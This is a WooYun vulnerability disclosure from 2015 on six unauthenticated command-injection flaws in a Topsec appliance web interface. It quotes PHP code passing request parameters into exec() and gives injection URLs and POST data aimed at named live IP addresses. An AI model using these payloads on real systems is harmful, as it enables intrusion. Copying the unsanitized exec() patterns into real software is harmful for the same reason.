当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117621

漏洞标题:天融信某系统前台无需登录命令执行六处

相关厂商:天融信

漏洞作者: 路人甲

提交时间:2015-06-02 11:39

修复时间:2015-09-02 17:06

公开时间:2015-09-02 17:06

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认,细节仅向厂商公开
2015-06-07: 细节向第三方安全合作伙伴开放
2015-07-29: 细节向核心白帽子及相关领域专家公开
2015-08-08: 细节向普通白帽子公开
2015-08-18: 细节向实习白帽子公开
2015-09-02: 细节向公众公开

简要描述:

天融信某系统前台无需登录命令执行六处

详细说明:

bytecache_run_action.php:

<?php 
require_once dirname(__FILE__)."/../common/commandWrapper.inc";
require_once dirname(__FILE__)."/../common/UciUtil.inc";
$action = $_GET['action'];
$engine = $_GET['engine'];
$ipfilter= $_GET['ipfilter'];
if($action=="1"){
$ipFilterArray = split("[/.]",$ipfilter);
for($m =0 ;$m<4 ;$m++){
if($ipFilterArray[$m]>15){
$ipFilterArray[$m]=dechex($ipFilterArray[$m]);
}else{
$ipFilterArray[$m]="0".dechex($ipFilterArray[$m]);
}
}

$ipFilterNum =$ipFilterArray[0].$ipFilterArray[1].$ipFilterArray[2].$ipFilterArray[3];
UciUtil::setValue('appex', 'sys', 'BCDebugEngineId',$engine);
UciUtil::setValue('appex', 'sys', 'BCDebugIpFilter',$ipfilter);
startByteCacheDebug($engine,$ipFilterNum);
}else{
$engine = UciUtil::getValue('appex', 'sys', 'BCDebugEngineId');
stopByteCacheDebug($engine);
}
?>


第一处:
setValue
跟进去:

public static function setValue($package, $config, $option, $value){
self::getUciDao()->set($package, $config, $option, $value);
}


再跟进去:

public function setConfig($package,$config,$value){
$cmd = UCI_CMD." set ".$package.".".$config."=".$value;
exec($cmd);
}


说明value可控
第二处:
startByteCacheDebug($engine,$ipFilterNum);
跟进去:

function startByteCacheDebug($engine,$ipFilter){
$command = "/tmp/appexcfg/bin/apxdebug.sh start "." ".$engine." ".$ipFilter." >/dev/null &";
execute($command);
}


第三处:
当action 不是1的时候
stopByteCacheDebug($engine);
跟进去:

function stopByteCacheDebug($engine){
$command = "/tmp/appexcfg/bin/apxdebug.sh stop "." ".$engine." & ";
execute($command);
//echo $command;
}


证明一处即可:
http://218.206.217.19:8080/acc/debug/bytecache_run_action.php?action=1&engine= | echo wooyun > a.php | &ipfilter=10
访问:
http://218.206.217.19:8080/acc/debug/a.php
第四处:
change_lan.php

$lanID = 'En';

$refLink = $_SERVER['HTTP_REFERER'];
if(empty($refLink)){
$refLink = "/index.php";
}
$refLink = str_replace("?error=1", "", $refLink);
if(array_key_exists('LanID',$_REQUEST))
{
$lanID = $_REQUEST["LanID"];
$appexSystemDao = new AppexSystemDao();
$appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD,$lanID);
$appexSystemDao->commit();
session_start();


跟进setAppexSystemConfigItemValue:

public function setAppexSystemConfigItemValue($option,$value){
parent::set(UCI_APPEX,"sys",$option,$value);
}


再跟进;

public function set($package,$config,$option,$value){
$cmd = UCI_CMD." set ".$package.".".$config.".".$option."='".$value."'";
exec($cmd);
}


http://61.148.24.182:8080/change_lan.php
postdata:
LanID=1' | echo ' wooyun' > a.php | '

1.png


第五处:
enable_tool_debug.php:

<?php
require_once dirname(__FILE__)."/../common/commandWrapper.inc";
error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);
$val = $_GET['val'];
$tool = $_GET['tool'];
$par = $_GET['par'];
runTool($val,$tool,$par);
?>


runTool:

function runTool($val,$tool,$par){
if($val=="0"){
UciUtil::setValue('system', 'runtool', 'tool', $tool);
UciUtil::setValue('system', 'runtool', 'parameter', $par);
UciUtil::commit('system');
if($tool=="1"){
exec('ping '.$par.'>/tmp/tool_result &');
}else if($tool=="2"){
exec('traceroute '.$par.'>/tmp/tool_result &');
}
}else if($val=="1"){
$tool=UciUtil::getValue('system', 'runtool', 'tool');
if($tool=="1"){
exec('killall ping ');
}else if($tool=="2"){
exec('killall traceroute ');
}
UciUtil::setValue('system', 'runtool', 'tool', '');
UciUtil::setValue('system', 'runtool', 'parameter', '');
UciUtil::commit('system');
exec('echo "">/tmp/tool_result');
}


http://61.54.222.33:8080/acc/tools/enable_tool_debug.php?val=0&tool=1&par=172.0.0.1' | echo wooyun > a.php | '

2.png


getMacAddr.php:

<?php 
include_once dirname(__FILE__).'/../common/commandWrapper.inc';
$tmpeth = $_GET['eth'];
$tmpmacAddr = strtoupper(getMacAddrFromIfName($tmpeth));
echo '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="mac" id="mac" value="'.$tmpmacAddr.'" >';
?>


跟进getMacAddrFromIfName

function getMacAddrFromIfName($ifName){
$mac = execute('cat /sys/class/net/' . trim($ifName) . '/address')->get('output');
if($mac != null && $mac != '')
return $mac[0];
else
return '';

}


http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php |
访问http://218.206.217.19:8080/acc/network/c.php 即可
http://61.148.24.182:8080/
http://61.54.222.39:8080/
http://61.148.24.182:8080
http://61.54.222.33:8080

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-06-04 17:05

厂商回复:

已经收到其它网站漏洞报送,谢谢关注

最新状态:

暂无